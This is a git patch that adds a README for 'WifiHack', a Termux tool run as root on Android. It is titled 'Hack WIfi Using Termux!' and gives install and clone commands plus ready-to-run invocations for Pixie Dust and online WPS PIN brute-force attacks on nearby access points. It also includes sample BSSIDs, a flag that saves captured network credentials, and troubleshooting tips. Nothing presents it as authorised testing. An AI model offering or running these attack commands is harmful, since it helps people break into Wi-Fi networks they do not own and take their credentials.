From c28979c46009f45a9d00922344927412cc382f54 Mon Sep 17 00:00:00 2001 From: FARHAN-SUPERUSERS <124022055+Gtajisan@users.noreply.github.com> Date: Mon, 25 Sep 2023 22:40:48 +0600 Subject: [PATCH] Add files via upload --- README.md | 93 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 README.md diff --git a/README.md b/README.md new file mode 100644 index 0000000..83d7a27 --- /dev/null +++ b/README.md @@ -0,0 +1,93 @@ + +### Hack WIfi Using Termux! (Requires Root) +

+ +## [Termux](https://termux.com/) +Please note that root access is required. + +### Manually +**Installing requirements** + ``` + pkg install -y root-repo + ``` + ``` + pkg install -y git tsu python wpa-supplicant pixiewps iw openssl + ``` +### Getting WifiHack + ``` + git clone --depth 1 https://github.com/Gtajisan/WifiHack + ``` + ``` + cd WifiHack + ``` +### Running + ``` + sudo python farhan.py -i wlan0 -K + ``` +### One line Command + ``` + sudo python WifiHack/farhan.py -i wlan0 -K + ``` + +# Usage +``` + farhan.py + Required arguments: + -i, --interface= : Name of the interface to use + + Optional arguments: + -b, --bssid= : BSSID of the target AP + -p, --pin= : Use the specified pin (arbitrary string or 4/8 digit pin) + -K, --pixie-dust : Run Pixie Dust attack + -B, --bruteforce : Run online bruteforce attack + --push-button-connect : Run WPS push button connection + + Advanced arguments: + -d, --delay= : Set the delay between pin attempts [0] + -w, --write : Write AP credentials to the file on success + -F, --pixie-force : Run Pixiewps with --force option (bruteforce full range) + -X, --show-pixie-cmd : Alway print Pixiewps command + --vuln-list= : Use custom file with vulnerable devices list ['vulnwsc.txt'] + --iface-down : Down network interface when the work is finished + -l, --loop : Run in a loop + -r, --reverse-scan : Reverse order of networks in the list of networks. Useful on small displays + --mtk-wifi : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit + (for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this. + -v, --verbose : Verbose output + ``` + +## Usage examples +Start Pixie Dust attack on a specified BSSID: + ``` + sudo python3 farhan.py -i wlan0 -b 00:90:4C:C1:AC:21 -K + ``` +Show avaliable networks and start Pixie Dust attack on a specified network: + ``` + sudo python3 farhan.py -i wlan0 -K + ``` +Launch online WPS bruteforce with the specified first half of the PIN: + ``` + sudo python3 farhan.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234 + ``` + Start WPS push button connection:s + ``` + sudo python3 farhan.py -i wlan0 --pbc + ``` +## Troubleshooting +#### "RTNETLINK answers: Operation not possible due to RF-kill" + Just run: +```sudo rfkill unblock wifi``` +#### "Device or resource busy (-16)" + Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running OneShot with ```--iface-down``` argument. +#### The wlan0 interface disappears when Wi-Fi is disabled on Android devices with MediaTek SoC + Try running WifiHack with the `--mtk-wifi` flag to initialize Wi-Fi device driver. +# Acknowledgements +## Special Than all root users +* FARHAN X ME +## [Facebook](https://www.facebook.com/profile.php?id=100094924471568&mibextid=ZbWKwL) + +## [Whatsapp](https://wa.me/+880130505723*) + +## Thanks For Using This Tool πŸΈπŸ™„ +## ki obsta 🀑 +## cd WifiHack sudo python WifiHack/farhan.py -i wlan0 -K